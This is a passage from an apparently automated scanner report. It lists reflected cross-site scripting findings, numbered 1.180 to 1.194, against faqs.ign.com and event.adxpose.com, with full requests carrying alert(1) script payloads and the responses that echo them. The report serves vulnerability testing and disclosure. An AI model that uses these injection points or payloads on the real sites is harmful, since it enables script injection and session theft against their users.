<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://dvd.ign.com/index/reviews.html?e0437"><script>alert(1)</script>5e965407bab=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.180. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 80c1a<script>alert(1)</script>e55540c1d1a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&uid=amRZRPmRXMjwy5CP_17780c1a<script>alert(1)</script>e55540c1d1a&xy=0%2C0&wh=300%2C250&vchannel=177&cid=Tribal%20Fusion&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.1&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E3651A1AA59DADE1B8CFA9A237B00BEB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 142
Date: Mon, 07 Feb 2011 01:03:52 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("amRZRPmRXMjwy5CP_17780c1a<script>alert(1)</script>e55540c1d1a");

1.181. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be29"-alert(1)-"60680a1de34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?7be29"-alert(1)-"60680a1de34=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15004-1134624784-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043449492v-1n-12mc+1297043449492mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 134315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/?7be29"-alert(1)-"60680a1de34=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.182. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af47c"><script>alert(1)</script>c0300f37c7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af47c"><script>alert(1)</script>c0300f37c7e=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:46 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-1220699879-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043446397v-1n-12mc+1297043446397mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 134390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/?af47c"><script>alert(1)</script>c0300f37c7e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.183. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /ftp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b48"><script>alert(1)</script>efed23619dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ftp.html?35b48"><script>alert(1)</script>efed23619dd=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:56 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-584603399-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:56 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043456781v-1n-12mc+1297043456781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/ftp.html?35b48"><script>alert(1)</script>efed23619dd=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.184. http://faqs.ign.com/ftp.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /ftp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce97b"-alert(1)-"e2eae7445aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ftp.html?ce97b"-alert(1)-"e2eae7445aa=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-562982197-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:59 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043459152v-1n-12mc+1297043459152mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 79055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/ftp.html?ce97b"-alert(1)-"e2eae7445aa=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.185. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/000/000437.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d709"-alert(1)-"d433f769511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/000/000437.html?3d709"-alert(1)-"d433f769511=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:46 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-129084908-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043446781v-1n-12mc+1297043446781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 122091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/000/000437.html?3d709"-alert(1)-"d433f769511=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.186. http://faqs.ign.com/objects/000/000437.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/000/000437.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe0e"><script>alert(1)</script>7df89b8b82a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/000/000437.html?1fe0e"><script>alert(1)</script>7df89b8b82a=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18740-1524669549-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043440967v-1n-12mc+1297043440967mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/000/000437.html?1fe0e"><script>alert(1)</script>7df89b8b82a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.187. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14349501.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a659"-alert(1)-"5be776a8e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/143/14349501.html?5a659"-alert(1)-"5be776a8e5b=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27912-1385020287-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043438139v-1n-12mc+1297043438139mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/143/14349501.html?5a659"-alert(1)-"5be776a8e5b=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.188. http://faqs.ign.com/objects/143/14349501.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14349501.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb74b"><script>alert(1)</script>de5f96bc04e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/143/14349501.html?fb74b"><script>alert(1)</script>de5f96bc04e=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-1247651907-11;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:33 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043433922v-1n-12mc+1297043433922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/143/14349501.html?fb74b"><script>alert(1)</script>de5f96bc04e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.189. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14354229.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f038c"><script>alert(1)</script>47bca99c6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/143/14354229.html?f038c"><script>alert(1)</script>47bca99c6d1=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:32 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-315926001-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043432506v-1n-12mc+1297043432506mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 108000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/143/14354229.html?f038c"><script>alert(1)</script>47bca99c6d1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.190. http://faqs.ign.com/objects/143/14354229.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/143/14354229.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9595"-alert(1)-"45b43c2733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/143/14354229.html?a9595"-alert(1)-"45b43c2733=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:35 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-73863227-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:35 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043435559v-1n-12mc+1297043435559mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 107913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/143/14354229.html?a9595"-alert(1)-"45b43c2733=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.191. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/748/748589.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd185"-alert(1)-"4d7636543fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/748/748589.html?fd185"-alert(1)-"4d7636543fe=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:35 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-1245665397-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:35 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043435203v-1n-12mc+1297043435203mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://faqs.ign.com/objects/748/748589.html?fd185"-alert(1)-"4d7636543fe=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.192. http://faqs.ign.com/objects/748/748589.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/748/748589.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c75"><script>alert(1)</script>de8ae575179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/748/748589.html?23c75"><script>alert(1)</script>de8ae575179=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:31 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15005-1472647881-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043431307v-1n-12mc+1297043431307mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/748/748589.html?23c75"><script>alert(1)</script>de8ae575179=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.193. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/857/857126.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55411"><script>alert(1)</script>dc9dc68c55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/857/857126.html?55411"><script>alert(1)</script>dc9dc68c55c=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:36 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15002-1739638031-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043436596v-1n-12mc+1297043436596mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://faqs.ign.com/objects/857/857126.html?55411"><script>alert(1)</script>dc9dc68c55c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.194. http://faqs.ign.com/objects/857/857126.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://faqs.ign.com
Path:   /objects/857/857126.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 156cf"-alert(1)-"7126e096cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/857/857126.html?156cf"-alert(1)-"7126e096cae=1 HTTP/1.1
Host: faqs.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:50:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
